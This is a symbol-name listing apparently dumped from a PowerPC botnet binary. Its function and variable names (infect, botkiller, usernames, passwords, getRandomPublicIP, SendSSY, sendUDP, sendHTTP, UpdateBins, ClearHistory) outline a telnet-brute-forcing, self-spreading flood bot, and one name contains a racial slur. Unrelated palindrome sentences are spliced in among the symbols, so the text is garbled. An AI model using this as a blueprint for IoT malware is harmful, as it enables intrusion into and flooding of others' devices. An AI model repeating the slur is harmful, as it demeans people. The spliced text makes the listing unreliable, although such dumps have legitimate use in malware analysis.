__C_ctype_b.c
__C_ctype_b_data
__C_ctype_toupper.c
__C_ctype_toupper_data
__errno_location.c
fclose.c
fopen.c
printf.c
Degas are we not drawn onward no In union drawn onward to new eras aged
snprintf.c
sprintf.c
vsnprintf.c
_fopen.c
_stdio.c
__stdio_mutex_initializer.4550
_stdio_streams
_fixed_buffers
_wcommit.c
vfprintf.c
_vfprintf_internal.c
_charpad
_fp_out_narrow
spec_base.4769
prefix.4770
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
spec_flags.4773
spec_chars.4774
type_codes
type_sizes
qual_chars.4778
spec_ranges.4775
spec_or_mask.4776
spec_and_mask.4777
_bss_custom_printf_spec
feof.c
fgets.c
fputs.c
fflush_unlocked.c
fgets_unlocked.c
fputs_unlocked.c
fwrite_unlocked.c
memcpy.c
memset.c
strchr.c
strcmp.c
strcpy.c
strlen.c
strncpy.c
strnlen.c
strstr.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.1369
_string_syserrmsgs.c
bcopy.c
bzero.c
strcasecmp.c
strcasestr.c
strtok.c
next_start.1347
isatty.c
tcgetattr.c
tcsetattr.c
ntohl.c
inet_ntoa.c
buf.2950
inet_makeaddr.c
gethostbyname.c
gethostbyname2.c
hoste.5411
buf.5412
connect.c
getsockname.c
getsockopt.c
recv.c
send.c
sendto.c
setsockopt.c
shutdown.c
socket.c
sigaddset.c
sigempty.c
alula
signal.c
sigsetops.c
malloc.c
__malloc_largebin_index
realloc.c
free.c
__malloc_trim
abort.c
mylock
been_there_done_that
rand.c
random.c
unsafe_state
randtbl
random_r.c
random_poly_info
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
execl.c
sleep.c
sysconf.c
nprocessors_onln
usleep.c
__uClibc_main.c
__pthread_return_0
__check_one_fd
system.c
__syscall_error.c
clock_getres.c
execve.c
getegid.c
geteuid.c
getgid.c
getuid.c
mmap.c
mremap.c
munmap.c
nanosleep.c
sbrk.c
wait4.c
__C_ctype_tolower.c
__C_ctype_tolower_data
closedir.c
opendir.c
fd_to_DIR
C.1.3507
readdir64.c
errno.c
__h_errno_location.c
parse_config.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
_WRITE.c
_fwrite.c
_trans2w.c
_load_inttype.c
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
fgetc.c
fgetc_unlocked.c
memmove.c
memchr.c
mempcpy.c
memrchr.c
strchrnul.c
strcspn.c
strrchr.c
strspn.c
strtok_r.c
strpbrk.c
inet_aton.c
gethostbyname2_r.c
raise.c
sigaction.c
calloc.c
dl-support.c
libc/sysdeps/linux/powerpc/brk.S
__syscall_rt_sigaction.c
fstat.c
xstatconv.c
getdents64.c
fseeko.c
fseeko64.c
_READ.c
Beeb
_adjust_pos.c
_rfill.c
_trans2r.c
_cs_funcs.c
rawmemchr.c
ntop.c
inet_pton4
xdigits.3392
inet_ntop4
decoded.c
dnslookup.c
last_id.5469
last_ns_num.5468
opennameservers.c
skip_nospace
skip_and_NUL_space
resolv_conf_mtime.5451
closenameservers.c
get_hosts_byname_r.c
gethostbyname_r.c
gethostname.c
poll.c
stat.c
uname.c
llseek.c
strdup.c
encodeh.c
decodeh.c
encodeq.c
read_etc_hosts_r.c
encoded.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
__init_array_start
__preinit_array_start
__read_etc_hosts_r
__GI_execve
__libc_sigaction
strcpy
recvLine
rangesA
__GI_sigaddset
__GI___ctype_b
__GI_memchr
__GI___glibc_strerror_r
waitpid
__res_sync
__open_nameservers
getType
__GI_fopen
getrlimit
ioctl
_stdio_openlist_use_count
__GI_initstate_r
__GI_sigaction
strtok_r
__GI_time
getgid
sysconf
printf
stdout
random
__GI_strdup
__GI_getpagesize
getdtablesize
__GI_h_errno
fdopendir
contains_fail
__GI___ctype_toupper
__GI_strcasecmp
recv
connect
__encode_question
__GI___uClibc_fini
numpids
__encode_header
SendBO2
sigemptyset
getRandomPublicIPB
__pthread_mutex_lock
initConnection
__sigdelset
__GI_clock_getres
__xstat32_conv
__uClibc_fini
memrchr
geteuid
inet_pton
__GI_snprintf
__GI_vsnprintf
__GI_setsid
memmove
sendTCP
snprintf
__GI_strpbrk
__GI_fgetc
__GI_htonl
__stdio_trans2r_o
munmap
__GI_setsockopt
__libc_stack_end
__GI_fclose
__GI_wcsnrtombs
__GI_pipe
rangesB2
_uintmaxtostr
__libc_fcntl
atol
_h_errno
getRandomPublicIP
getc_unlocked
__ctype_b
__GI_random_r
usernames
errno
getegid
read_until_response
__GI_sbrk
zprintf
__GI___uClibc_init
usleep
execve
infectedmessage
getpagesize
getpid
__GI_lseek64
setstate_r
fgets
getHost
wildString
__xpg_strerror_r
getc
memcpy
makeRandomStr
getRandomIP
__GI_fputs_unlocked
execl
__GI_fgets
sendHTTP
_stdio_openlist_dec_use
sclose
__libc_select
_ppfs_init
__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
trim
__GI_fgets_unlocked
dup2
__pthread_mutex_init
TelnetNigger
GetRandomIP
getuid
__GI_htons
system
__open_etc_hosts
feof
malloc
isatty
sleep
vsnprintf
__dns_lookup
__GI_read
__C_ctype_tolower
random_r
__dso_handle
clock_getres
gethostbyname_r
tcpcsum
reset_telstate
fdpclose
socket
__GI_dup2
select
__GI_ntohl
_pthread_cleanup_pop_restore
__GI_wcrtomb
__GI___libc_fcntl
__GI_memset
__GI_closedir
isspace
__stdio_seek
mempcpy
__GI_strcoll
__GI_write
__ctype_toupper
__resolv_timeout
__libc_read
__GI_opendir
_string_syserrmsgs
__GI_open
__GI_strchr
__searchdomain
sigaddset
makeISPacket
__GI_tcgetattr
__environ
mmap
__GI_ntohs
_Exit
wcsnrtombs
bzero
makeIPPacket
sockprintf
__GI_inet_ntoa
send
__fgetc_unlocked
abort
oldranges
__GI_fcntl
__GI_wcsrtombs
__GI_fwrite_unlocked
__GI_getgid
srandom_r
__GI_fputs
_init
__GI_inet_ntoa_r
__GI_setstate_r
parseHex
strtol
pipe
__libc_lseek64
SendSSY
strnlen
rawmemchr
uname
__GI_mempcpy
__malloc_state
__sigaddset
strrchr
nanosleep
__GI_send
h_errno
calloc
__pthread_mutex_unlock
wait4
__GI_exit
__app_fini
csum
__exit_cleanup
rindex
__GI_execl
__GI_srandom_r
__GI___sigismember
__GI___ctype_tolower
write
environ
__GI_close
getBuild
Server_Botport
fstat
__resolv_lock
God A red nugget A fat egg under a dog
kill
fputs_unlocked
__pthread_mutex_trylock
__GI___sigaddset
__GI_brk
__GI_nanosleep
__GI_stat
__GI_strtok
_stdio_openlist
__GI_sigprocmask
inet_addr
ntohl
__GI_gethostname
__GI_fseek
makeSAHeader
_custom_printf_arginfo
__deregister_frame_info
ourIP
chdir
fseeko
_stdio_openlist_del_count
connectTimeout
setsockopt
bsd_signal
fseek
mremap
__GI_kill
__GI_strcmp
__GI_memmove
sendSTD
setstate
__decode_dotted
__local_nameserver
__stdio_READ
memchr
__GI_toupper
__pthread_initialize_minimal
__GI_recv
tmpdirs
__stdin
stdin
__GI_isatty
_custom_printf_spec
gethostbyname2_r
__progname
strcasestr
_start
strstr
__GI_ioctl
init_rand
rand
__close_nameservers
getRandomPublicIP2
signal
read
__xstat64_conv
__decode_header
_SDA_BASE_
getCores
__GI___h_errno_location
__GI_memcpy
strcoll
rangesC1
oldranges2
wcsrtombs
_stdio_user_locking
strncpy
program_invocation_short_name
strcasecmp
htonl
sendto
__C_ctype_toupper
StartTheLelz
__GI___C_ctype_b
__GI_tcsetattr
realloc
__GI_gethostbyname_r
__GI_strncpy
realrand
__libc_send
__GI___xpg_strerror_r
currentServer
readdir64
__GI___C_ctype_tolower
__GI_getrlimit
bcopy
__GI_strcpy
__GI_inet_ntop
strtok
ClearHistory
__stdio_adjust_position
malloc_trim
__GI_poll
_vfprintf_internal
__GI_strcasestr
fork
__GI___fcntl_nocancel
__stdio_rfill
gotIP
__GI_sleep
sigaction
__GI_gethostbyname
_dl_phdr
__GI_getc_unlocked
__uClibc_init
__GI_munmap
_store_inttype
__getpagesize
__GI_random
__GI_mremap
__syscall_error
__uclibc_progname
__GI_getegid
__GI_wait4
__malloc_lock
__uClibc_main
sbrk
__rtld_fini
__GI_fork
strdup
__libc_close
__GI_getpid
inet_aton
index
_pthread_cleanup_push_defer
processCmd
__sigismember
fopen
__bss_start
__libc_open
__GI_strchrnul
getOurIP
get_telstate_host
memset
__GI_socket
main
__glibc_strerror_r
ourPublicIP
SendRAP
listFork
__stdio_fwrite
negotiate
srand
__GI_uname
__resolv_attempts
initstate
fclose
__syscall_rt_sigaction
rangesC3
__xstat_conv
ntohs
sendUDP
inet_ntoa
tcgetattr
time
opendir
__libc_system
__GI_abort
poll
UpdateBins
fdpopen
__GI___sigdelset
__get_hosts_byname_r
SendPHT
__stdio_init_mutex
rangesB1
__GI__exit
botkiller
strcmp
infected
__GI_strrchr
shutdown
advances2
__nameserver
data_start
__GI_sysconf
infect
__h_errno_location
matchPrompt
getcwd
__GI_inet_pton
gethostbyname
_stdio_fopen
advance_state
_fini
__GI_chdir
__vfork
__GI_mmap
fgetc
gethostname
contains_success
sprintf
fdgets
strerror_r
__GI_select
fixedEchoLoader
__libc_waitpid
strcspn
socket_connect
__GI_waitpid
_stdio_term
__GI_vfprintf
__GI_signal
stderr
fails
__GI_readdir64
getRandomPublicIPC
vfork
__C_ctype_b
srandom
_ppfs_setargs
__GI_sendto
hacked
getBuild_echo
__GI_sigemptyset
__GI_printf
__libc_fork
__atexit_lock
scanPid
__fcntl_nocancel
rand_cmwc
findARandomIP
advances
getsockopt
__GI_fseeko64
fflush_unlocked
__stdio_wcommit
contains_string
__GI___fgetc_unlocked
__nameservers
fwrite_unlocked
stat
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
contains_response
__GI_gethostbyname2
_edata
__stdout
__GI_memrchr
__GI_fflush_unlocked
__GI_isspace
__GI_strstr
__searchdomains
__GI_fstat
_end
htons
_sigintr
_ppfs_prepargs
__GI_strspn
fgetc_unlocked
initstate_r
__GI_connect
__curbrk
_dl_phnum
_fpmaxtostr
__errno_location
uppercase
_stdlib_strto_l
exit
rangesC2
__stdio_WRITE
_stdio_init
__GI_geteuid
inet_ntop
gethostbyname2
__GI_getcwd
_dl_aux_init
_errno
atoi
successes
_stdio_openlist_del_lock
__GI_inet_aton
_custom_printf_handler
fgets_unlocked
_exit
szprintf
strspn
__libc_recv
__getdents64
strlen
lseek64
open
program_invocation_name
toupper
__libc_write
__malloc_consolidate
_ppfs_parsespec
__GI_strtol
__GI_getuid
__GI_strtok_r
__GI_errno
__libc_sendto
__stdio_trans2w_o
__GI_vfork
__GI_config_read
strchr
__GI_rawmemchr
__GI_gethostbyname2_r
fputs
__GI_raise
__data_start
setsid
__GI_inet_addr
__GI_config_open
closedir
getRandomPublicIPA
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
macAddress
__GI___errno_location
strchrnul
readUntil
fcntl
bots
read_with_timeout
__GI_atoi
fseeko64
__GI_sprintf
tcsetattr
__ctype_tolower
__register_frame_info
wcrtomb
__GI_getsockname
close
__GI_config_close
__libc_connect
passwords
__GI_strlen
mainCommSock
pids
vfprintf
__progname_full
strpbrk
getBogos
_load_inttype
rangechoice
raise
free
__GI_strcspn
sigprocmask
getsockname
